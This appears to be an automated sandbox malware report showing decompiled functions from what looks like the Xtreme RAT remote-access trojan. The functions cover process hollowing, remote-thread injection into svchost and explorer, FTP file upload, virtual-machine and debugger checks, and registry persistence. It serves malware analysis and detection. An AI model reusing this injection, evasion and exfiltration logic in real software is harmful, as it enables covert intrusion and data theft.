				_t149 = __eax;
				_t171 = _a4;
				 *((intOrPtr*)(__ecx)) = 0;
				_v9 = 0;
				_push(0xc848a9);
				_push( *[fs:edx]);
				 *[fs:edx] = _t178;
				E00C81284( &(_v668.ExtendedRegisters), 0x44);
				E00C81284( &_v396, 0x10);
				E00C81284( &_v668, 0xcc);
				_v668.ExtendedRegisters.cb = 0x44;
				_v668.ContextFlags = 0x10007;
				E00C845F0();
				_t167 = _t149 + _v32;
				E00C845F0();
				if(_t171 == 0) {
					_t80 = CreateProcessW(0, _v8, 0, 0, 0, 4, 0, 0,  &(_v668.ExtendedRegisters),  &_v396);
					asm("sbb eax, eax");
					_t81 = _t80 + 1;
				} else {
					_t167 = _t171;
					E00C82914( &_v396, _t167);
					_t81 = 1;
				}
				if(_t81 == 1) {
					 *_t173 = _v396.hProcess;
					Sleep(0xc8);
					GetThreadContext(_v396.hThread,  &_v668);
					ReadProcessMemory(_v396.hProcess, _v668.Ebx + 8,  &_v24, 4,  &_v20);
					NtUnmapViewOfSection(_v396.hProcess,  &_v24);
					_v16 = VirtualAllocEx(_v396.hProcess, _v288, _v260, 0x3000, 4);
					WriteProcessMemory(_v396.hProcess, _v16, _t149, _v256,  &_v20);
					_v28 = _v32 + 0xf8;
					_t175 = (_v334 & 0x0000ffff) - 1;
					if(_t175 >= 0) {
						_t176 = _t175 + 1;
						_t172 = 0;
						do {
							asm("cdq");
							_push(_t167);
							_push(_t149);
							asm("adc edx, [esp+0x4]");
							_t179 = _t178 + 8;
							_push(0);
							_push(_v28 +  *_t178);
							asm("cdq");
							asm("adc edx, [esp+0x4]");
							_t180 = _t179 + 8;
							E00C845F0();
							_push( &_v20);
							_push(_v364);
							asm("cdq");
							_t167 = 0;
							asm("adc edx, [esp+0x4]");
							_t178 = _t180 + 8;
							WriteProcessMemory(_v396.hProcess, _v16 + _v368, _v360 +  *_t180, _t149, (_t172 << 3) + (_t172 << 3) * 4 +  *_t179);
							VirtualProtectEx(_v396.hProcess, _v16 + _v368, _v372, 0x40,  &_v24);
							_t172 = _t172 + 1;
							_t176 = _t176 - 1;
						} while (_t176 != 0);
					}
					_t113 = WriteProcessMemory(_v396, _v668.Ebx + 8,  &_v16, 4,  &_v20);
					asm("sbb eax, eax");
					_v9 = _t113 + 1;
					_v668.Eax = _v16 + _v300;
					if(_v9 == 1) {
						_t119 = SetThreadContext(_v396.hThread,  &_v668);
						asm("sbb eax, eax");
						_v9 = _t119 + 1;
						ResumeThread(_v396.hThread);
					}
				}
				_pop(_t168);
				 *[fs:eax] = _t168;
				return 0;
			}

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C846D4
Sleep.KERNEL32(000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,00C848A9,?,00C8FCCC,00000000), ref: 00C846F4
GetThreadContext.KERNEL32(?,?), ref: 00C84707
ReadProcessMemory.KERNEL32(?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C84727
NtUnmapViewOfSection.NTDLL(?,?), ref: 00C84737
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000), ref: 00C84758
WriteProcessMemory.KERNEL32(?,?,00000000,?,?,?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8), ref: 00C84777
WriteProcessMemory.KERNEL32(?,?,?), ref: 00C84809
VirtualProtectEx.KERNEL32(?,?,?,00000040,?,?,?,?), ref: 00C8482C
WriteProcessMemory.KERNEL32(?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004,?), ref: 00C84854
SetThreadContext.KERNEL32(?,?), ref: 00C84885
ResumeThread.KERNEL32(?,?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004), ref: 00C8489A

Strings

D, xrefs: 00C84662

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C83CE4, Relevance: 10.6, APIs: 7, Instructions: 70
injectionthread

C-Code - Quality: 76%

			E00C83CE4(void* __eax, void* __ecx, _Unknown_base(*)()* __edx) {
				long _v20;
				long _v24;
				intOrPtr _v28;
				void* _v32;
				_Unknown_base(*)()* _v36;
				void* _t18;
				void* _t30;
				struct HINSTANCE__* _t32;
				void* _t35;
				long _t36;
				void* _t37;

				_v32 = __ecx;
				_v36 = __edx;
				_t30 = __eax;
				_v28 = 0;
				_t32 = GetModuleHandleA(0);
				_push(0);
				_push(_t32);
				asm("cdq");
				_t18 =  *((intOrPtr*)(_t32 + 0x3c)) + _v20;
				asm("adc edx, [esp+0x4]");
				_t36 =  *(_t18 + 0x50);
				_t35 =  *(_t18 + 0x34);
				VirtualFreeEx(_t30, _t35, 0, 0x8000);
				_t37 = VirtualAllocEx(_t30, _t35, _t36, 0x3000, 0x40);
				if(_t37 != 0) {
					WriteProcessMemory(_t30, _t35, GetModuleHandleA(0), _t36,  &_v24);
					if(_t36 <= _v24) {
						CreateRemoteThread(_t30, 0, 0, _v36, _v32, 0,  &_v20);
						CloseHandle(_t30);
						_v32 = _t37;
					}
				}
				return _v28;
			}

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00C83CFC
VirtualFreeEx.KERNEL32(0000017C,?,00000000,00008000), ref: 00C83D26
VirtualAllocEx.KERNEL32(0000017C,?,?,00003000,00000040,0000017C,?,00000000,00008000), ref: 00C83D35
GetModuleHandleA.KERNEL32(00000000,?,?,0000017C,?,?,00003000,00000040,0000017C,?,00000000,00008000), ref: 00C83D48
WriteProcessMemory.KERNEL32(0000017C,?,00000000,00000000,?,?,0000017C,?,?,00003000,00000040,0000017C,?,00000000,00008000), ref: 00C83D50
CreateRemoteThread.KERNEL32(0000017C,00000000,00000000,?,?,00000000,?), ref: 00C83D71
CloseHandle.KERNEL32(0000017C), ref: 00C83D77

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C87918, Relevance: 10.6, APIs: 7, Instructions: 62
network

C-Code - Quality: 80%

			E00C87918(WCHAR* __eax, WCHAR* __ecx, WCHAR* __edx, WCHAR* _a4, WCHAR* _a8, WCHAR* _a12) {
				WCHAR* _v8;
				WCHAR* _v12;
				int _t14;
				WCHAR* _t25;
				void* _t33;
				void* _t36;

				_v12 = __ecx;
				_v8 = __edx;
				_t25 = __eax;
				_t36 = InternetOpenW(0, 1, 0, 0, 0);
				_t33 = InternetConnectW(_t36, _t25, 0x15, _a8, _a4, 1, 0x8000000, 0);
				_t14 = FtpSetCurrentDirectoryW(_t33, _v8);
				asm("sbb eax, eax");
				WaitForSingleObject(_t14 + 0x00000001 & 0x0000007f, 0xffffffff);
				FtpPutFileW(_t33, _v12, _a12, 2, 0);
				asm("sbb ebx, ebx");
				InternetCloseHandle(_t36);
				InternetCloseHandle(_t33);
				return  &(_t25[0]);
			}

0x00c87921
0x00c87924
0x00c87927
0x00c87938
0x00c87954
0x00c8795b
0x00c87963
0x00c8796c
0x00c8797e
0x00c87986
0x00c8798a
0x00c87990
0x00c8799d

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C87933
InternetConnectW.WININET(00000000,?,00000015,?,?,00000001,08000000,00000000), ref: 00C8794F
FtpSetCurrentDirectoryW.WININET(00000000,?), ref: 00C8795B
WaitForSingleObject.KERNEL32(00000001,000000FF), ref: 00C8796C
FtpPutFileW.WININET(00000000,?,00000000,00000002,00000000), ref: 00C8797E
InternetCloseHandle.WININET(00000000), ref: 00C8798A
InternetCloseHandle.WININET(00000000), ref: 00C87990

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C881BC, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 65

C-Code - Quality: 70%

			E00C881BC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v264;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				void* _t35;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				void* _t58;
				void* _t61;

				_t56 = __edi;
				_v304 = 0;
				_v312 = 0;
				_v316 = 0;
				_v308 = 0;
				_push(_t61);
				_push(0xc882b4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t61 + 0xfffffec8;
				_t58 = E00C8809C(2, 0);
				_v300 = 0x128;
				while(E00C880BC(_t58,  &_v300) != 0) {
					E00C81958( &_v308, 0x104,  &_v264);
					E00C82D90(_v308, 0,  &_v304, _t56, _t58, __eflags);
					_push(_v304);
					E00C82D90("VBoxService.exe", 0,  &_v316, _t56, _t58, __eflags);
					E00C81928( &_v312, E00C81A48(_v316));
					_pop(_t53);
					_t35 = E00C81A9C(_v312, _t53);
					__eflags = _t35;
					if(_t35 <= 0) {
						continue;
					} else {
						CloseHandle(_t58);
					}
					L5:
					_pop(_t54);
					 *[fs:eax] = _t54;
					_push(E00C882BB);
					return E00C81770( &_v316, 4);
				}
				CloseHandle(_t58);
				goto L5;
			}

APIs

Part of subcall function 00C82D90: CharUpperA.USER32(?), ref: 00C82DCE

CloseHandle.KERNEL32(00000000), ref: 00C88272
CloseHandle.KERNEL32(00000000), ref: 00C88291

Strings

VBoxService.exe, xrefs: 00C8823F

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C835B0, Relevance: 3.0, APIs: 2, Instructions: 16

C-Code - Quality: 100%

			E00C835B0(WCHAR* __eax) {
				void* _t2;
				void* _t5;
				struct _WIN32_FIND_DATAW* _t6;

				_t2 = FindFirstFileW(__eax, _t6);
				if(_t2 != 0xffffffff) {
					_t5 = 1;
				} else {
					_t5 = 0;
				}
				CloseHandle(_t2);
				return _t5;
			}

0x00c835b9
0x00c835c1
0x00c835c7
0x00c835c3
0x00c835c3
0x00c835c3
0x00c835ca
0x00c835d8

APIs

FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
CloseHandle.KERNEL32(00000000), ref: 00C835CA

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C886CC, Relevance: 1.3, Strings: 1, Instructions: 24

C-Code - Quality: 37%

			E00C886CC(void* __ebx) {
				char _v8;
				intOrPtr _t15;

				_push(0);
				_push(0xc88722);
				_push( *[fs:eax]);
				 *[fs:eax] = _t15;
				E00C817E4( &_v8, "DAEMON");
				_push(0);
				_push(_v8);
				if(( *( *[fs:0x30] + 2) & 0x000000ff) != 0) {
					return 1;
				} else {
					return 0;
				}
			}

0x00c886cf
0x00c886d5
0x00c886da
0x00c886dd
0x00c886e8
0x00c886ed
0x00c886ef
0x00c886ff
0x00c8870b
0x00c88701
0x00c88704
0x00c88704

Strings

DAEMON, xrefs: 00C886E3

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C88674, Relevance: .0, Instructions: 21

C-Code - Quality: 100%

			E00C88674() {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t12;
				signed int _t13;

				_t13 =  *( *[fs:0x30] + 2) & 0x000000ff;
				if(_t13 == 0 || _t13 == 0) {
					_v8 = 1;
				}
				_v12 = 1;
				if(_v12 == 1) {
					_t12 = 1;
				}
				if(_v8 == 1) {
					_t12 = 0;
				}
				return _t12;
			}

0x00c88685
0x00c88687
0x00c8868b
0x00c8868b
0x00c88692
0x00c8869d
0x00c8869f
0x00c8869f
0x00c886a5
0x00c886a7
0x00c886a7
0x00c886ae

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C88760, Relevance: .0, Instructions: 5

C-Code - Quality: 100%

			E00C88760() {
				intOrPtr _t7;

				_t7 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
				 *((intOrPtr*)(_t7 + 0x20)) =  *((intOrPtr*)(_t7 + 0x20)) + 0x2000;
				return _t7;
			}

0x00c8876a
0x00c8876d
0x00c88774

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C87E20, Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00C87E20() {

				if( *0xc8e034 == 0) {
					 *0xc8e034 = GetModuleHandleA("kernel32.dll");
					if( *0xc8e034 != 0) {
						 *0xc8e038 = GetProcAddress( *0xc8e034, "CreateToolhelp32Snapshot");
						 *0xc8e03c = GetProcAddress( *0xc8e034, "Heap32ListFirst");
						 *0xc8e040 = GetProcAddress( *0xc8e034, "Heap32ListNext");
						 *0xc8e044 = GetProcAddress( *0xc8e034, "Heap32First");
						 *0xc8e048 = GetProcAddress( *0xc8e034, "Heap32Next");
						 *0xc8e04c = GetProcAddress( *0xc8e034, "Toolhelp32ReadProcessMemory");
						 *0xc8e050 = GetProcAddress( *0xc8e034, "Process32First");
						 *0xc8e054 = GetProcAddress( *0xc8e034, "Process32Next");
						 *0xc8e058 = GetProcAddress( *0xc8e034, "Process32FirstW");
						 *0xc8e05c = GetProcAddress( *0xc8e034, "Process32NextW");
						 *0xc8e060 = GetProcAddress( *0xc8e034, "Thread32First");
						 *0xc8e064 = GetProcAddress( *0xc8e034, "Thread32Next");
						 *0xc8e068 = GetProcAddress( *0xc8e034, "Module32First");
						 *0xc8e06c = GetProcAddress( *0xc8e034, "Module32Next");
						 *0xc8e070 = GetProcAddress( *0xc8e034, "Module32FirstW");
						 *0xc8e074 = GetProcAddress( *0xc8e034, "Module32NextW");
					}
				}
				if( *0xc8e034 == 0 ||  *0xc8e038 == 0) {
					return 0;
				} else {
					return 1;
				}
			}

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00C880A7,00000000,00000000,00C881FD,00000000,00C882B4,?,00000000,?), ref: 00C87E34
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00C880A7,00000000,00000000,00C881FD,00000000,00C882B4,?,00000000,?), ref: 00C87E4C
GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00C880A7,00000000,00000000,00C881FD,00000000,00C882B4,?,00000000,?), ref: 00C87E5E
GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00C880A7,00000000,00000000,00C881FD,00000000,00C882B4,?,00000000), ref: 00C87E70
GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00C880A7,00000000,00000000,00C881FD,00000000,00C882B4), ref: 00C87E82
GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00C880A7,00000000,00000000,00C881FD), ref: 00C87E94
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00C880A7,00000000), ref: 00C87EA6
GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 00C87EB8
GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 00C87ECA
GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 00C87EDC
GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 00C87EEE
GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 00C87F00
GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 00C87F12
GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 00C87F24
GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 00C87F36
GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 00C87F48
GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 00C87F5A

Strings

Module32FirstW, xrefs: 00C87F40
CreateToolhelp32Snapshot, xrefs: 00C87E44
Thread32Next, xrefs: 00C87F0A
Heap32ListFirst, xrefs: 00C87E56
Heap32Next, xrefs: 00C87E8C
Process32FirstW, xrefs: 00C87ED4
Module32Next, xrefs: 00C87F2E
Module32NextW, xrefs: 00C87F52
Process32NextW, xrefs: 00C87EE6
Heap32ListNext, xrefs: 00C87E68
Process32Next, xrefs: 00C87EC2
Thread32First, xrefs: 00C87EF8
kernel32.dll, xrefs: 00C87E2F
Process32First, xrefs: 00C87EB0
Toolhelp32ReadProcessMemory, xrefs: 00C87E9E
Module32First, xrefs: 00C87F1C
Heap32First, xrefs: 00C87E7A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C8A024, Relevance: 51.0, APIs: 9, Strings: 20, Instructions: 262
sleep

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E00C8A024(void* __ebx, void* __edx, void* __eflags) {
				short* _t33;
				void* _t34;
				short* _t37;
				short* _t39;
				short* _t42;
				short* _t48;
				short* _t58;
				intOrPtr _t74;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t82;
				intOrPtr* _t83;
				void* _t86;
				void* _t88;
				void* _t90;
				long _t91;
				short* _t100;
				int* _t102;
				void* _t104;
				int* _t107;
				void* _t109;
				intOrPtr _t111;
				int* _t113;
				void* _t115;
				intOrPtr _t117;
				void* _t119;
				intOrPtr* _t126;
				void* _t138;
				intOrPtr* _t140;
				intOrPtr _t162;
				void* _t163;
				void* _t164;
				intOrPtr _t166;
				intOrPtr _t169;
				intOrPtr _t173;
				intOrPtr _t184;
				void* _t190;
				signed int _t194;
				void* _t195;
				void* _t224;
				intOrPtr _t225;
				short* _t228;
				intOrPtr _t233;
				intOrPtr _t235;
				intOrPtr* _t239;
				intOrPtr _t243;
				intOrPtr* _t245;
				intOrPtr _t264;
				WCHAR* _t269;
				void* _t272;
				void* _t273;
				intOrPtr _t274;
				void* _t276;
				void* _t278;

				_t276 = __eflags;
				E00C814F0();
				_push(_t273);
				_push(0xc8a09d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t274;
				_push(E00C812A4(0x1b) + 1);
				_push(E00C812A4(0xa) + 1);
				_push(E00C812A4(0xa) + 1);
				_push(E00C812A4(0xa) + 1);
				_push(E00C812A4(0xb) + 1);
				_push(E00C812A4(6) + 0x7d1);
				_t33 =  *0xc8f898; // 0xc30000
				_t34 = E00C836D8(_t33, _t276);
				_pop(_t224);
				_pop(_t195);
				E00C83BC4(_t34, __ebx, _t195, _t224);
				_pop(_t225);
				 *[fs:eax] = _t225;
				_t37 =  *0xc8f898; // 0xc30000
				E00C83674(_t37);
				_t39 =  *0xc8f898; // 0xc30000
				E00C83674(E00C836D8(_t39, _t276));
				_t42 =  *0xc8f898; // 0xc30000
				E00C82F90(0x80000001, E00C833A8(L"SOFTWARE\\", 0xc8f38c, _t276), _t276, 2, _t42);
				memcpy(0xc8fccc, 0xc8e07c, 0x607 << 2);
				_t269 = 0xc8ec8a;
				_t48 =  *0xc8f898; // 0xc30000
				E00C82E48(_t48);
				_t228 =  *0xc8f898; // 0xc30000
				E00C82914(0xc914e8, _t228);
				E00C82E48(E00C833A8(L"Software\\Microsoft\\Active Setup\\Installed Components\\", 0xc8f302, _t276));
				E00C82914(0xc91b06, _t53);
				_t58 =  *0xc8f898; // 0xc30000
				_t194 = E00C836D8(_t58, _t276);
				E00C82E48(_t194);
				E00C82914(0xc916f2, _t194);
				if( *0xc8f38a == 1) {
					_t269 = E00C8263C(0, 0, "DSma9HnKaPERSIST");
					_t278 = GetLastError() - 0xb7;
					if(_t278 == 0) {
						CloseHandle(_t269);
					} else {
						CloseHandle(_t269);
						 *0xc8f89c = E00C833A8(L"svchost.exe", 0xc8a704, _t278);
						E00C8291C();
						_t184 =  *0xc8f89c; // 0x19a0000
						E00C82E48(_t184);
						_t264 =  *0xc8f89c; // 0x19a0000
						E00C82914(0xc8fac0, _t264);
						 *0xc8f8ac = E00C83EA8(0xc8fac0, 0xc91f1c, _t273);
						_t190 =  *0xc8f8ac; // 0x17c
						E00C83CE4(_t190, 0xc8fccc,  &M00C88EF8);
					}
				}
				E00C81CD8(_t273 - 0x1838, 0x11, 0xc8f2b2);
				_t233 =  *0xc8b0dc; // 0x2ad9cc
				E00C81DBC( *((intOrPtr*)(_t273 - 0x1838)), _t233);
				if(_t278 != 0) {
					E00C81CD8(_t273 - 0x183c, 0x11, 0xc8f2b2);
					_t235 =  *0xc8b0d8; // 0x2a7934
					E00C81DBC( *((intOrPtr*)(_t273 - 0x183c)), _t235);
					if(__eflags != 0) {
						 *0xc8f89c = E00C833A8(0xc8f2b2, 0xc8a704, __eflags);
						_t74 =  *0xc8f89c; // 0x19a0000
						 *0xc8f8ac = E00C83EA8(_t74, 0xc91f1c, _t273);
						__eflags =  *0xc8f8ac;
						if(__eflags == 0) {
							_t162 =  *0xc8f89c; // 0x19a0000
							_t163 = E00C83A54(_t162, 0xc8f8ac);
							__eflags = _t163;
							if(_t163 != 0) {
								_t164 =  *0xc8f8ac; // 0x17c
								 *0xc8f89c = E00C83B10(_t164);
							} else {
								 *0xc8f89c = E00C83094();
							}
							_t166 =  *0xc8f89c; // 0x19a0000
							 *0xc8f8ac = E00C83EA8(_t166, 0xc91f1c, _t273);
							__eflags =  *0xc8f8ac;
							if(__eflags == 0) {
								 *0xc8f89c = E00C83094();
								_t169 =  *0xc8f89c; // 0x19a0000
								 *0xc8f8ac = E00C83EA8(_t169, 0xc91f1c, _t273);
							}
						}
					} else {
						 *0xc8f89c = E00C83094();
						_t173 =  *0xc8f89c; // 0x19a0000
						 *0xc8f8ac = E00C83EA8(_t173, 0xc91f1c, _t273);
					}
				} else {
					 *0xc8f8ac = 0;
				}
				_t272 = 0;
				 *0xc8f8a8 = 0;
				_t279 =  *0xc8f2b0;
				if( *0xc8f2b0 != 0) {
					_t194 =  *0xc8f898; // 0xc30000
					_t269 = E00C833A8(E00C83420(0, _t194, 0), 0xc8a704, _t279);
					if(E00C83960(_t194, E00C82E48(_t194), _t269) == 0) {
						SetFileAttributesW(_t269, 0x80);
						_t281 = E00C82E48(_t269) + _t155;
						E00C82914(0xc91d10, _t269);
						E00C83CE4(E00C83EA8(E00C833A8(L"explorer.exe", 0xc8a704, E00C82E48(_t269) + _t155), 0xc91f1c, _t273), 0xc91d10, E00C897F4);
					}
				}
				_t79 = E00C833A8(E00C836D8(0xc918fc, _t281), 0xc90fdc, _t281);
				_t239 =  *0xc8b0f0; // 0xc8e01c
				 *_t239 = _t79;
				_t80 =  *0xc8b0f0; // 0xc8e01c
				_t82 = E00C833A8( *_t80, L".xtr", _t281);
				_t241 =  *0xc8b0f0; // 0xc8e01c
				 *_t241 = _t82;
				_t83 =  *0xc8b0f0; // 0xc8e01c
				if(E00C835B0( *_t83) != 0 && E00C87B84(L"local", _t194, _t272) == 1) {
					_t284 =  *0xc8f8ac;
					if( *0xc8f8ac == 0) {
						GetModuleFileNameW(0, "svchost.exe", 0x20a);
						 *0xc8f8ac = E00C83EA8(0xc8fac0, 0xc91f1c, _t273);
					}
					_t245 =  *0xc8b0e4; // 0xc8e024
					_t126 =  *0xc8b0e8; // 0xc8e020
					E00C82B90( *_t126, _t194, L"XTREME",  *_t245 - 0x1e, _t269, _t272, _t284);
					E00C82E14(_t273 - 0x1844, L"XTREME", 0, GetCurrentProcessId(), 0);
					E00C81D10(_t273 - 0x1840,  *((intOrPtr*)(_t273 - 0x1844)), L"SOFTWARE\\", _t284);
					E00C82F90(0x80000001, E00C81CF4( *((intOrPtr*)(_t273 - 0x1840))), _t284, 2, "DSma9HnKa");
					_t138 =  *0xc8f8b0; // 0xd8
					CloseHandle(_t138);
					_t140 =  *0xc8b0e8; // 0xc8e020
					_t241 = 0;
					E00C84600( *_t140, 0xc8f8ac, 0, 0, 0xc91f1c);
					Sleep(0x3e8);
					ExitProcess(0);
				}
				_t286 =  *0xc8f8ac;
				if( *0xc8f8ac != 0) {
					_t86 =  *0xc8f8b0; // 0xd8
					CloseHandle(_t86);
					while(1) {
						_t242 = E00C88BC0;
						_t88 =  *0xc8f8ac; // 0x17c
						 *0xc8f8a8 = E00C83CE4(_t88, 0xc8fccc, E00C88BC0);
						Sleep(0x1f4);
						__eflags =  *0xc8f8a8;
						if( *0xc8f8a8 == 0) {
							_t113 =  *0xc8b0e0; // 0xc8b000
							_t115 =  *0xc8f8ac; // 0x17c
							TerminateProcess(_t115,  *_t113);
							_t242 = 0xc91f1c;
							_t117 =  *0xc8f89c; // 0x19a0000
							 *0xc8f8ac = E00C83EA8(_t117, 0xc91f1c, _t273);
						}
						_t272 = _t272 + 1;
						_t90 = E00C8263C(0, 0, "DSma9HnKa");
						_t270 = _t90;
						_t91 = GetLastError();
						__eflags = _t91 - 0xb7;
						_t194 = _t194 & 0xffffff00 | _t91 == 0x000000b7;
						CloseHandle(_t90);
						__eflags = _t194;
						if(_t194 == 0) {
							_t107 =  *0xc8b0e0; // 0xc8b000
							_t109 =  *0xc8f8ac; // 0x17c
							TerminateProcess(_t109,  *_t107);
							_t242 = 0xc91f1c;
							_t111 =  *0xc8f89c; // 0x19a0000
							 *0xc8f8ac = E00C83EA8(_t111, 0xc91f1c, _t273);
						}
						__eflags = _t272 - 7;
						if(_t272 >= 7) {
							break;
						}
						__eflags = _t194 - 1;
						if(_t194 != 1) {
							continue;
						}
						break;
					}
					E00C840F8(0xc8e07c, _t194, _t242, _t270, _t272);
					__eflags =  *0xc8f8a8;
					if(__eflags == 0) {
						_t102 =  *0xc8b0e0; // 0xc8b000
						_t104 =  *0xc8f8ac; // 0x17c
						TerminateProcess(_t104,  *_t102);
						E00C88BC0(_t194, _t270, _t272, __eflags, 0xc8fccc);
					}
					__eflags = _t272 - 7;
					if(_t272 >= 7) {
						__eflags = _t194;
						if(_t194 == 0) {
							_t100 =  *0xc8f898; // 0xc30000
							ShellExecuteW(0, L"open", _t100, 0, 0, 0);
						}
					}
					goto L39;
				} else {
					_t119 =  *0xc8f8b0; // 0xd8
					CloseHandle(_t119);
					E00C840F8(0xc8e07c, _t194, _t241, _t269, _t272);
					E00C88BC0(_t194, _t269, _t272, _t286, 0xc8fccc);
					L39:
					_pop(_t243);
					 *[fs:eax] = _t243;
					_push(0xc8a632);
					E00C81B90(_t273 - 0x1844, 5);
					return E00C81B78(_t273 - 0x14);
				}
			}

0x00c8a024
0x00c8a024
0x00c8a02b
0x00c8a02c
0x00c8a031
0x00c8a034
0x00c8a042
0x00c8a04e
0x00c8a05a
0x00c8a066
0x00c8a072
0x00c8a081
0x00c8a082
0x00c8a087
0x00c8a08c
0x00c8a08d
0x00c8a08e
0x00c8a095
0x00c8a098
0x00c8a0a7
0x00c8a0ac
0x00c8a0b1
0x00c8a0bb
0x00c8a0c0
0x00c8a0e3
0x00c8a0f7
